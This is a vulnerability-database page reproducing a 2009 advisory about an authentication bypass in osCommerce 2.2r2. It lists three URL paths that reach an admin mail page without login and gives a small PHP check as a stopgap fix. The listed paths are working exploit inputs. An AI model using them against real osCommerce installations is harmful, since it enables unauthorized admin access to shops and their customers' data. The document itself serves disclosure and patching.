Lucene search
K

OS Commerce 2.2r2 authentication bypass

🗓️ 13 Nov 2009 00:00:00Reported by Stuart UdallType 
zdt
 zdt
🔗 0day.today👁 20 Views

OS Commerce 2.2r2 authentication bypass with admin page access without logi

Code
=======================================
OS Commerce 2.2r2 authentication bypass
=======================================

When this hole was brought to our attention, we were amazed to find that it seems nobody has caught it yet!! There is a page in the admin that can be access without login AND can pass parameters!!
 
/admin/mail.php/login.php
/admin/mail.php/login.php?fooled
/admin/mail.php/login.php?action=send_email_to_user
 
All work!
 
We "patched" this hole by adding this line of code:
 
if(strstr($_SERVER['REQUEST_URI'], "/admin/mail.php/login.php" ) !== false){
        echo "<h1>NO ACCESS</h1>";
        exit;
}
 


#  0day.today [2017-12-31]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Nov 2009 00:00Current
7.1High risk
Vulners AI Score7.1
20